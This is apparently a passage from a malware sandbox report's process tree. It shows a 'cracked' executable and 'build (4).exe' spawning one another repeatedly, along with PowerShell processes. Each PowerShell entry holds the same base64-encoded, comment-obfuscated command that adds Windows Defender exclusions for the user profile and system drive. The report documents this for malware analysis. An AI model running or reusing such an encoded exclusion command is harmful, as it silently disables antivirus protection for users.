        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        114⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        114⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        114⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        115⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        115⤵
        System Location Discovery: System Language Discovery
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        115⤵
        
        PID:6836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        116⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        116⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        116⤵
        
        PID:7420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        117⤵
        
        PID:8812
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        117⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        117⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        118⤵
        
        PID:9000
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        118⤵
        
        PID:9008
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        118⤵
        
        PID:9108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        119⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        119⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        119⤵
        System Location Discovery: System Language Discovery
        
        PID:6860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        120⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        120⤵
        
        PID:8868
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        120⤵
        
        PID:6372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        121⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        121⤵
        
        PID:8744
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        121⤵
        
        PID:1004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        122⤵
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        122⤵
        
        PID:5768
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        122⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        123⤵
        
        PID:7548
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        123⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        123⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        124⤵
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        124⤵
        
        PID:7764
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        124⤵
        
        PID:8692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        125⤵
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        125⤵
        
        PID:484
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        125⤵
        
        PID:8772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        126⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        126⤵
        
        PID:2884
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        126⤵
        
        PID:3572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        127⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        127⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        127⤵
        
        PID:7744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        128⤵
        
        PID:8684
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        128⤵
        
        PID:9056
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        128⤵
        
        PID:8196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        129⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        129⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        129⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        130⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        130⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        130⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        131⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        131⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        131⤵
        
        PID:8196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        132⤵
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        132⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        132⤵
        System Location Discovery: System Language Discovery
        
        PID:6196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        133⤵
        
        PID:7572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        133⤵
        
        PID:8772
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        133⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        134⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        134⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        134⤵
        
        PID:7424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        135⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        135⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        135⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        136⤵
        
        PID:1444
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        136⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        136⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        137⤵
        
        PID:8716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        138⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        137⤵
        
        PID:8904
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        137⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        138⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        138⤵
        
        PID:7344
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        138⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        139⤵
        
        PID:9288
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        139⤵
        
        PID:9316
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        139⤵
        
        PID:9324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        140⤵
        
        PID:9468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        140⤵
        
        PID:9476
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        140⤵
        
        PID:9540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
